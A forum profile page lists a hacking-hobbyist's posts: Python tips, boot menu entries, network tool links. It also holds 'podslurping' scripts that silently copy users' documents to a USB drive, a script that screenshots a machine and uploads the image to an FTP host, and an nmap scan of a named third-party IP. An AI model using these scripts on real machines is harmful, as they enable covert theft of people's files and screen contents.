Jump to content

ls

Active Members
  • Posts

    122
  • Joined

  • Last visited

Everything posted by ls

  1. I started with http://hetland.org/writing/instant-hacking.html it's a great introduction
  2. ls

    Breaking out...

    You could use jondo, it's also a proxy program but it's more secure than your average web proxy https://www.jondos.de/en/jondonym
  3. We really should get all the menu.lst entries in one place. Here are some of mines: Invaders : http://www.erikyyy.de/invaders/ title invaders kernel /images/invaders/invaders boot Slitaz : http://www.slitaz.org/en/ title slitaz kernel /images/slitaz/boot/bzImage root=/dev/null vga=771 initrd /images/slitaz/boot/rootfs.gz Clonezilla: http://clonezilla.org/ title clonezilla root (hd0,3) kernel /images/clonezilla/live/vmlinuz1 boot=live union=aufs vga=788 ip=frommedia live-media-path=/images/clonezilla/live bootfrom=/dev/hda toram=filesystem.squashfs initrd /images/clonezilla/live/initrd1.img boot Tinycore: http://www.tinycorelinux.com/ title Tinycore kernel /images/tinycore/boot/bzImage initrd /images/tinycore/boot/tinycore.gz
  4. ls

    nmap ?

    You can use nmap -sP 192.168.0.1/24 to do a simple ping sweep of the range 192.168.0.1 - 192.168.0.255. But you may want to check out autoscan http://autoscan-network.com. From the autoscan website:
  5. You can use HTTrack to create an offline copy from a website: http://www.httrack.com/
  6. ls

    Small surf OS?

    What about puppy linux? http://www.puppylinux.org/
  7. You can use peerguardian on linux to: http://ubuntuforums.org/showthread.php?t=95793
  8. I wrote some code to do this in this post: http://hak5.org/forums/index.php?showtopic=11833 this was the code: import os,shutil exts = [".txt",".doc",".docx",".xls",".xlsx",".ppt",".pptx"] startpath = "C:\\Documents and Settings\\" def find(none, directory, filenames): for file in filenames: for ext in exts: if file.endswith(ext): fullfile = os.path.join(directory,file) try: shutil.copy(fullfile,file) except IOError: pass # access denied os.path.walk(startpath,find, None)
  9. This piece of python will take a screenshot (under linux and windows) and will upload it to an ftp server import os import ftplib FTPHOST = "ftp.example.com" FTPPORT = 21 FTPUSER = "anonymous" FTPPASS = "a@anonymous.com" def upload(filetoupload): ftp = ftplib.FTP() ftp.connect(FTPHOST,FTPPORT) ftp.login(FTPUSER,FTPPASS) f = open(filetoupload,'rb') ftp.storbinary(('STOR '+filetoupload),f) f.close() ftp.quit() def screenshot(shotname): shotname = shotname+".png" if os.name == "nt": import ImageGrab img = ImageGrab.grab() img.save(shotname) upload(shotname) os.remove(shotname) elif os.name == "posix": import gtk.gdk w = gtk.gdk.get_default_root_window() sz = w.get_size() pb = gtk.gdk.Pixbuf(gtk.gdk.COLORSPACE_RGB,False,8,sz[0],sz[1]) pb = pb.get_from_drawable(w,w.get_colormap(),0,0,0,0,sz[0],sz[1]) pb.save(shotname,"png") upload(shotname) os.remove(shotname) screenshot("screenshot")
  10. import urllib2 url = raw_input("Url : ") outputname = url.split('/')[-1] outputname = open(outputname,'w') for line in urllib2.urlopen(url).readlines(): outputname.write(line) outputname.close() print "Done" With this code you can download from http and from ftp you can find more info here: http://docs.python.org/library/urllib.html
  11. The problem with "blackhat" forums where everyone can register is that 90 % of the people there are 15 year old boys who want to hack their school if you are really interested in computer security it's better to go to "whitehat" sites where most people are serious and know what they are talking about. At least that's my experience
  12. Was metasploit defaced, shut down or is it just a prank? http://metasploit.com http://bayimg.com/iaODlAABL
  13. instead of writing chars = ["a","b",.....] you could say chars = list("abcdefghijklmnopqrstuvwxyz") it may save you some time
  14. You could show how easy it is to sniff an msn conversation. But I don't think they really care about privacy and security online.
  15. interesting: Starting Nmap 4.62 ( http://nmap.org ) at 2009-02-25 13:39 CET Insufficient responses for TCP sequencing (2), OS detection may be less accurate Interesting ports on 202.106.53.50: Not shown: 1697 closed ports PORT STATE SERVICE VERSION 23/tcp open telnet? 25/tcp filtered smtp 80/tcp filtered http 81/tcp open hosts2-ns? 110/tcp filtered pop3 135/tcp filtered msrpc 137/tcp filtered netbios-ns 138/tcp filtered netbios-dgm 139/tcp filtered netbios-ssn 445/tcp filtered microsoft-ds 593/tcp filtered http-rpc-epmap 4444/tcp filtered krb524 7070/tcp open http Apache httpd 2.0.52 ((Red Hat)) 8080/tcp filtered http-proxy 12345/tcp filtered netbus 12346/tcp filtered netbus 27374/tcp filtered subseven 31337/tcp filtered Elite an apache test page on port 7070 : http://202.106.53.50:7070/ also if you search google for this ip, you get alot of hosts.deny files but also a file called botnet.txt : http://robert.kolatzek.org/botnet.txt and look at this: http://202.106.53.50:81/
  16. I recommend this tutorial: http://hetland.org/writing/instant-hacking.html
  17. ls

    PodSlurping

    Yes it looks a bit overwhelming at first sight but it's actually quite simple: you first have to create a .spec file with the command python Makespec.py [option] pythonscript.py and then python Build.py pythonscript.spec
  18. ls

    PodSlurping

    I use pyinstaller to create an exe from an python script you may want to check it out at http://pyinstaller.python-hosting.com/ I uploaded the exe here http://rapidshare.com/files/192935015/podslurp.exe.html md5: 08cd1ea1533ccc0d80a926bf1dc1a1d3 podslurp.exe
  19. ls

    PodSlurping

    you're welcome, glad I could help
  20. ls

    PodSlurping

    voila, this script will copy all .txt, .doc, .docx, .pp, .pptx, .xls, .xlsx in the C:\Documents and settings\ directory import os,shutil exts = [".txt",".doc",".docx",".xls",".xlsx",".ppt",".pptx"] startpath = "C:\\Documents and Settings\\" def find(none, directory, filenames): for file in filenames: for ext in exts: if file.endswith(ext): fullfile = os.path.join(directory,file) try: shutil.copy(fullfile,file) except IOError: pass # access denied os.path.walk(startpath,find, None)
  21. ls

    PodSlurping

    A while ago, I wrote a script to collect alll images from a drive, i used this code: import os exts = [".jpg",".png",".bmp",".jpeg",".gif"] startpath = "/home/" def find(none, directory, filenames): for file in filenames: for ext in exts: if file.endswith(ext): file = os.path.join(directory,file) print file os.path.walk(startpath,find, None) this will print out all images, you can then use shutil (http://docs.python.org/library/shutil.html) to copy the file to your pendrive I will write a script later,(quite busy right now)
×
×
  • Create New...